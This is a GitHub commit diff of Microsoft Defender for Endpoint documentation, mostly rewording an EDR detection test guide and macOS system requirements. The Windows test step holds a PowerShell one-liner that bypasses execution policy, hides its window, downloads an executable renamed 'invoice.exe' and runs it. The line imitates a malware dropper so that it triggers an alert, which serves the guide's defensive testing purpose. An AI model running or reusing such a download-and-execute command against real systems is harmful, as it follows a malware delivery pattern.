Skip to content

Commit 3de587a

Browse files
authored
Merge pull request #1082 from denisebmsft/docs-editor/edr-detection-1722897070
Update edr-detection.md
2 parents f064ec3 + 59e32f3 commit 3de587a

File tree

2 files changed

+23
-14
lines changed

2 files changed

+23
-14
lines changed

defender-endpoint/edr-detection.md

Lines changed: 15 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -15,7 +15,7 @@ ms.custom: admindeeplinkDEFENDER
1515
ms.topic: conceptual
1616
ms.subservice: edr
1717
search.appverid: met150
18-
ms.date: 08/01/2024
18+
ms.date: 08/06/2024
1919
---
2020

2121
# EDR detection test for verifying device's onboarding and reporting services
@@ -33,7 +33,7 @@ ms.date: 08/01/2024
3333
- macOS
3434
- Microsoft Defender for Endpoint
3535
- Microsoft Defender for Endpoint on Linux
36-
- Microsoft Defender for Endpoint on macOS
36+
<!---- Microsoft Defender for Endpoint on macOS--->
3737

3838
Endpoint detection and response for Endpoint provide advanced attack detections that are near real-time and actionable. Security analysts can prioritize alerts effectively, gain visibility into the full scope of a breach, and take response actions to remediate threats.
3939

@@ -43,14 +43,13 @@ Run an EDR detection test to verify that the device is properly onboarded and re
4343

4444
1. Open a Command Prompt window
4545

46-
2. At the prompt, copy and run the command below. The Command Prompt window will close automatically.
46+
2. At the prompt, copy and run the following command. The Command Prompt window closes automatically.
4747

48+
```powershell
49+
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'
50+
```
4851

49-
```powershell
50-
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'
51-
```
52-
53-
3. If successful, the detection test will be marked as completed and a new alert will appear in few minutes.
52+
3. If successful, the detection test is marked as completed and a new alert appears within a few minutes.
5453

5554
### Linux
5655

@@ -64,7 +63,7 @@ curl -o ~/Downloads/MDE Linux DIY.zip https://aka.ms/MDE-Linux-EDR-DIY
6463
1. Extract the zip
6564

6665
```bash
67-
unzip ~/Downloads/MDE Linux DIY.zip
66+
unzip ~/Downloads/MDE-Linux-EDR-DIY.zip
6867
```
6968

7069
1. And run the following command:
@@ -77,6 +76,7 @@ After a few minutes, a detection should be raised in Microsoft Defender XDR.
7776

7877
3. Look at the alert details, machine timeline, and perform your typical investigation steps.
7978

79+
<!---
8080
### macOS
8181
8282
1. In your browser, Microsoft Edge for Mac or Safari, download *MDATP MacOS DIY.zip* from [https://aka.ms/mdatpmacosdiy](https://aka.ms/mdatpmacosdiy) and extract.
@@ -129,12 +129,16 @@ After a few minutes, a detection should be raised in Microsoft Defender XDR.
129129
130130
Look at the alert details and the device timeline, and perform the regular investigation steps.
131131
132-
Next steps that you can consider performing are to add AV exclusions as needed for application compatibility or performance:
132+
--->
133+
134+
## Next steps
135+
136+
If you're experiencing issues with application compatibility or performance, you might consider adding exclusions. See the following articles for more information:
133137

134138
- [Configure and validate exclusions for Microsoft Defender for Endpoint on macOS](mac-exclusions.md)
135139
- [Address false positives/negatives in Microsoft Defender for Endpoint](defender-endpoint-false-positives-negatives.md)
136140
- [Manage suppression rules](manage-suppression-rules.md)
137141
- [Create indicators of compromise (IoC)](manage-indicators.md)
138142
- [Create and manage custom detections rules](/defender-xdr/custom-detection-rules)
139143

140-
Read through [Microsoft Defender for Endpoint Security Operations Guide](mde-sec-ops-guide.md).
144+
Also, see the [Microsoft Defender for Endpoint Security Operations Guide](mde-sec-ops-guide.md).

defender-endpoint/microsoft-defender-endpoint-mac.md

Lines changed: 8 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -15,7 +15,7 @@ ms.collection:
1515
ms.topic: conceptual
1616
ms.subservice: macos
1717
search.appverid: met150
18-
ms.date: 05/08/2024
18+
ms.date: 08/06/2024
1919
---
2020

2121
# Microsoft Defender for Endpoint on Mac
@@ -70,14 +70,17 @@ There are several methods and deployment tools that you can use to install and c
7070
### System requirements
7171

7272
The three most recent major releases of macOS are supported.
73+
7374
- 14 (Sonoma), 13 (Ventura), 12 (Monterey)
75+
7476
> [!IMPORTANT]
7577
> On macOS 11 (Big Sur) and above, Microsoft Defender for Endpoint requires additional configuration profiles. If you are an existing customer upgrading from earlier versions of macOS, make sure to deploy the additional configuration profiles listed on [New configuration profiles for macOS Big Sur and newer versions of macOS](mac-sysext-policies.md).
7678
77-
- Supported processors: x64 and ARM64.
79+
- Supported processors: x64 and ARM64
80+
7881
- Disk space: 1GB
7982

80-
Beta versions of macOS aren't supported.
83+
- Beta versions of macOS aren't supported.
8184

8285
After you've enabled the service, you may need to configure your network or firewall to allow outbound connections between it and your endpoints.
8386

@@ -119,6 +122,8 @@ If a proxy or firewall is blocking anonymous traffic, make sure that anonymous t
119122
>
120123
> SSL inspection and intercepting proxies are also not supported for security reasons. Configure an exception for SSL inspection and your proxy server to directly pass through data from Microsoft Defender for Endpoint on macOS to the relevant URLs without interception. Adding your interception certificate to the global store will not allow for interception.
121124
125+
#### Test network connectivity
126+
122127
To test that a connection isn't blocked, open <https://x.cp.wd.microsoft.com/api/report> and <https://cdn.x.cp.wd.microsoft.com/ping> in a browser.
123128

124129
If you prefer the command line, you can also check the connection by running the following command in Terminal:

0 commit comments

Comments
 (0)